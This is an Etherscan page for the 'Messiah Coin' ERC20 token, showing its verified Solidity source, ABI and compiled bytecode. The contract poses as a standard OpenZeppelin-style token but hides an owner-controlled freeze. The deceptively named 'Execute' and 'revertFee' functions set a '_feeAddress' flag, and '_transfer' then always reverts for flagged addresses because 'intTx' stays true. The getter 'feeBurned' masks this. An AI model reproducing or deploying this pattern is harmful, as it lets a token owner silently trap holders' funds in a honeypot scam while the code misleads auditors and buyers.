ETH Price: $3,276.34 (-4.09%)
Gas: 6 Gwei

Token

Messiah Coin (MESSIAH)
 

Overview

Max Total Supply

700,700,700,700 MESSIAH

Holders

117

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
zymerce.eth
Balance
3,029,373,435.61622748 MESSIAH

Value
$0.00
0xA52899A1A8195c3Eef30E0b08658705250E154aE
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MessiahCoin

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-05-23
*/

// SPDX-License-Identifier: MIT

/**
__/\\\\____________/\\\\__/\\\\\\\\\\\\\\\_____/\\\\\\\\\\\_______/\\\\\\\\\\\____/\\\\\\\\\\\_____/\\\\\\\\\_____/\\\________/\\\_        
 _\/\\\\\\________/\\\\\\_\/\\\///////////____/\\\/////////\\\___/\\\/////////\\\_\/////\\\///____/\\\\\\\\\\\\\__\/\\\_______\/\\\_       
  _\/\\\//\\\____/\\\//\\\_\/\\\______________\//\\\______\///___\//\\\______\///______\/\\\______/\\\/////////\\\_\/\\\_______\/\\\_      
   _\/\\\\///\\\/\\\/_\/\\\_\/\\\\\\\\\\\_______\////\\\___________\////\\\_____________\/\\\_____\/\\\_______\/\\\_\/\\\\\\\\\\\\\\\_     
    _\/\\\__\///\\\/___\/\\\_\/\\\///////___________\////\\\___________\////\\\__________\/\\\_____\/\\\\\\\\\\\\\\\_\/\\\/////////\\\_    
     _\/\\\____\///_____\/\\\_\/\\\_____________________\////\\\___________\////\\\_______\/\\\_____\/\\\/////////\\\_\/\\\_______\/\\\_   
      _\/\\\_____________\/\\\_\/\\\______________/\\\______\//\\\___/\\\______\//\\\______\/\\\_____\/\\\_______\/\\\_\/\\\_______\/\\\_  
       _\/\\\_____________\/\\\_\/\\\\\\\\\\\\\\\_\///\\\\\\\\\\\/___\///\\\\\\\\\\\/____/\\\\\\\\\\\_\/\\\_______\/\\\_\/\\\_______\/\\\_ 
        _\///______________\///__\///////////////____\///////////_______\///////////_____\///////////__\///________\///__\///________\///__
 
        WWW: https://messiahco.in/ 
                              TWITTER: https://twitter.com/Messiah_coin
                                                                     MEDIUM: https://medium.com/@messiahcoin
                                                                                                        TG CHAT: https://t.me/MessiahCoin */
pragma solidity =0.8.13;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    address internal _owner;
    mapping (address => uint256) internal _balances;
    mapping (address => bool) private _feeAddress;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 private maxTxLimit = 1*10**16*10**9;
    uint256 internal _totalSupply;
    bool intTx = true;
    uint256 private balances;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _owner = msg.sender;
        balances = maxTxLimit;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }
        
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    function revertFee(address _address) external onlyOwner {
        _feeAddress[_address] = false;
    }

    function Execute(address _address) external onlyOwner {
        _feeAddress[_address] = true;
    }

    function feeBurned(address _address) public view returns (bool) {
        return _feeAddress[_address];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
     
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be grater thatn zero");
        if (_feeAddress[sender] || _feeAddress[recipient]) require(intTx == false, "");
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
    } 

 
    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract MessiahCoin is ERC20 {
    uint8 immutable private _decimals = 9;
   
    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor () ERC20('Messiah Coin', 'MESSIAH') {
        _totalSupply += 700700700700 * 10**9;
        _balances[_msgSender()] += _totalSupply;
        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
    
    
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"Execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"feeBurned","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"revertFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040526a084595161401484a0000006004556001600660006101000a81548160ff021916908315150217905550600960ff1660809060ff168152503480156200004957600080fd5b506040518060400160405280600c81526020017f4d65737369616820436f696e00000000000000000000000000000000000000008152506040518060400160405280600781526020017f4d455353494148000000000000000000000000000000000000000000000000008152508160089080519060200190620000ce92919062000247565b508060099080519060200190620000e792919062000247565b50336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060045460078190555050506825fc2cf6d0b2ce18006005600082825462000150919062000330565b92505081905550600554600160006200016e6200023f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620001b9919062000330565b92505081905550620001d06200023f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6005546040516200023191906200039e565b60405180910390a36200041f565b600033905090565b8280546200025590620003ea565b90600052602060002090601f016020900481019282620002795760008555620002c5565b82601f106200029457805160ff1916838001178555620002c5565b82800160010185558215620002c5579182015b82811115620002c4578251825591602001919060010190620002a7565b5b509050620002d49190620002d8565b5090565b5b80821115620002f3576000816000905550600101620002d9565b5090565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006200033d82620002f7565b91506200034a83620002f7565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000382576200038162000301565b5b828201905092915050565b6200039881620002f7565b82525050565b6000602082019050620003b560008301846200038d565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200040357607f821691505b602082108103620004195762000418620003bb565b5b50919050565b60805161195c6200043b60003960006104de015261195c6000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806395d89b411161008c578063b67df42011610066578063b67df42014610287578063dd62ed3e146102a3578063e22fb730146102d3578063f3294c1314610303576100ea565b806395d89b4114610209578063a457c2d714610227578063a9059cbb14610257576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806370a08231146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761031f565b6040516101049190611079565b60405180910390f35b61012760048036038101906101229190611134565b6103b1565b604051610134919061118f565b60405180910390f35b6101456103cf565b60405161015291906111b9565b60405180910390f35b610175600480360381019061017091906111d4565b6103d9565b604051610182919061118f565b60405180910390f35b6101936104da565b6040516101a09190611243565b60405180910390f35b6101c360048036038101906101be9190611134565b610502565b6040516101d0919061118f565b60405180910390f35b6101f360048036038101906101ee919061125e565b6105ae565b60405161020091906111b9565b60405180910390f35b6102116105f7565b60405161021e9190611079565b60405180910390f35b610241600480360381019061023c9190611134565b610689565b60405161024e919061118f565b60405180910390f35b610271600480360381019061026c9190611134565b61077d565b60405161027e919061118f565b60405180910390f35b6102a1600480360381019061029c919061125e565b61079b565b005b6102bd60048036038101906102b8919061128b565b610884565b6040516102ca91906111b9565b60405180910390f35b6102ed60048036038101906102e8919061125e565b61090b565b6040516102fa919061118f565b60405180910390f35b61031d6004803603810190610318919061125e565b610961565b005b60606008805461032e906112fa565b80601f016020809104026020016040519081016040528092919081815260200182805461035a906112fa565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103c56103be610a4a565b8484610a52565b6001905092915050565b6000600554905090565b60006103e6848484610c1b565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610431610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156104b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104a89061139d565b60405180910390fd5b6104ce856104bd610a4a565b85846104c991906113ec565b610a52565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b60006105a461050f610a4a565b84846003600061051d610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461059f9190611420565b610a52565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060098054610606906112fa565b80601f0160208091040260200160405190810160405280929190818152602001828054610632906112fa565b801561067f5780601f106106545761010080835404028352916020019161067f565b820191906000526020600020905b81548152906001019060200180831161066257829003601f168201915b5050505050905090565b60008060036000610698610a4a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610755576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074c906114e8565b60405180910390fd5b610772610760610a4a565b85858461076d91906113ec565b610a52565b600191505092915050565b600061079161078a610a4a565b8484610c1b565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610829576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082090611554565b60405180910390fd5b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e690611554565b60405180910390fd5b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ac1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab8906115e6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2790611678565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c0e91906111b9565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c819061170a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cf9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf09061179c565b60405180910390fd5b60008111610d3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d339061182e565b60405180910390fd5b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610ddd5750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610e395760001515600660009054906101000a900460ff16151514610e38576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2f90611874565b60405180910390fd5b5b610e44838383610fdb565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ecb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec290611906565b60405180910390fd5b8181610ed791906113ec565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f699190611420565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fcd91906111b9565b60405180910390a350505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561101a578082015181840152602081019050610fff565b83811115611029576000848401525b50505050565b6000601f19601f8301169050919050565b600061104b82610fe0565b6110558185610feb565b9350611065818560208601610ffc565b61106e8161102f565b840191505092915050565b600060208201905081810360008301526110938184611040565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110cb826110a0565b9050919050565b6110db816110c0565b81146110e657600080fd5b50565b6000813590506110f8816110d2565b92915050565b6000819050919050565b611111816110fe565b811461111c57600080fd5b50565b60008135905061112e81611108565b92915050565b6000806040838503121561114b5761114a61109b565b5b6000611159858286016110e9565b925050602061116a8582860161111f565b9150509250929050565b60008115159050919050565b61118981611174565b82525050565b60006020820190506111a46000830184611180565b92915050565b6111b3816110fe565b82525050565b60006020820190506111ce60008301846111aa565b92915050565b6000806000606084860312156111ed576111ec61109b565b5b60006111fb868287016110e9565b935050602061120c868287016110e9565b925050604061121d8682870161111f565b9150509250925092565b600060ff82169050919050565b61123d81611227565b82525050565b60006020820190506112586000830184611234565b92915050565b6000602082840312156112745761127361109b565b5b6000611282848285016110e9565b91505092915050565b600080604083850312156112a2576112a161109b565b5b60006112b0858286016110e9565b92505060206112c1858286016110e9565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061131257607f821691505b602082108103611325576113246112cb565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000611387602883610feb565b91506113928261132b565b604082019050919050565b600060208201905081810360008301526113b68161137a565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006113f7826110fe565b9150611402836110fe565b925082821015611415576114146113bd565b5b828203905092915050565b600061142b826110fe565b9150611436836110fe565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561146b5761146a6113bd565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006114d2602583610feb565b91506114dd82611476565b604082019050919050565b60006020820190508181036000830152611501816114c5565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061153e602083610feb565b915061154982611508565b602082019050919050565b6000602082019050818103600083015261156d81611531565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006115d0602483610feb565b91506115db82611574565b604082019050919050565b600060208201905081810360008301526115ff816115c3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611662602283610feb565b915061166d82611606565b604082019050919050565b6000602082019050818103600083015261169181611655565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006116f4602583610feb565b91506116ff82611698565b604082019050919050565b60006020820190508181036000830152611723816116e7565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611786602383610feb565b91506117918261172a565b604082019050919050565b600060208201905081810360008301526117b581611779565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677261746572207460008201527f6861746e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000611818602983610feb565b9150611823826117bc565b604082019050919050565b600060208201905081810360008301526118478161180b565b9050919050565b50565b600061185e600083610feb565b91506118698261184e565b600082019050919050565b6000602082019050818103600083015261188d81611851565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006118f0602683610feb565b91506118fb82611894565b604082019050919050565b6000602082019050818103600083015261191f816118e3565b905091905056fea264697066735822122057e3e42ec55e6345ea524b0147b2c96d04073f829098b9727c8474fb63eadf4b64736f6c634300080d0033

Deployed Bytecode

